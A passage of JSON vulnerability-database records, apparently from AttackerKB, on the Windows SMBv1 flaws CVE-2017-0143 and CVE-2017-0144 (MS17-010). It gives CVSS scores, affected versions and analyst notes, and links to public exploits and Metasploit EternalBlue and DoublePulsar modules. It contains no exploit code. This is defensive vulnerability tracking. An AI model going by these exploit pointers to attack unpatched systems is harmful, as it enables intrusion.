"MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-07-20T20:14:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-07-20T20:14:39", "rev": 2}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.securityfocus.com/bid/96703"], "Advisory": ["https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970"], "Miscellaneous": ["https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2020-09-08T17:05:00"}, "lastseen": "2021-07-20T20:14:39", "differentElements": ["attackerkb", "cvss2", "cvss3", "last_activity", "references_categories", "tags", "wildExploited"], "edition": 5}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "fc3435eeb89f98d367e167f793e8d9ae384cf384f773cee18e45b61b8c325ec4", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\n**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-20T20:14:39", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2021-07-20T20:14:39", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-20T20:14:39", "rev": 2, "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.5", "attackerkb": {}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {}, "tags": [], "mitre_vector": {}, "last_activity": null}, "lastseen": "2021-07-20T20:14:39", "differentElements": ["attackerkb", "cvss2", "cvss3", "last_activity", "references_categories", "tags", "wildExploited", "wildExploitedCategory", "wildExploitedReports"], "edition": 6}], "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96705", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-03T16:41:41", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2021-11-03T16:41:41", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://us-cert.cisa.gov/ncas/alerts/aa20-133a", "published": "2021-11-03T15:27:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.securityfocus.com/bid/96703"], "Advisory": ["https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970"], "Miscellaneous": ["https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2021-11-03T15:27:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.base.Bulletin", "robots.models.attackerkb.AttackerKB"]}, {"id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "hash": "d04213b4b44a7f61713381fe039d09f448cbf49978927b69da7d266cee06f787", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0144 (MS17-010)", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "https://www.exploit-db.com/exploits/42031", "https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-20T20:10:58", "history": [{"bulletin": {"attackerkb": {"attackerValue": 5, "exploitability": 4}, "bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "enchantments": {"dependencies": {"modified": "2021-01-27T12:09:36", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"], "type": "attackerkb"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-01-27T12:09:36", "rev": 2, "value": 7.0, "vector": "NONE"}}, "hash": "050c2a8e8805c2f99989043cb5682649", "history": [], "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "immutableFields": [], "last_activity": null, "lastseen": "2021-01-27T12:09:36", "mitre_vector": {}, "modified": "2020-07-30T00:00:00", "objectVersion": "1.5", "published": "2017-03-17T00:00:00", "references": ["https://www.exploit-db.com/exploits/42030", "https://www.exploit-db.com/exploits/41987", "https://www.exploit-db.com/exploits/42031", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "references_categories": {}, "reporter": "AttackerKB", "tags": [], "title": "CVE-2017-0144 (MS17-010)", "type": "attackerkb", "viewCount": 3, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": []}, "differentElements": ["references_categories"], "edition": 1, "lastseen": "2021-01-27T12:09:36"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am UTC reported:\n\nAssessed 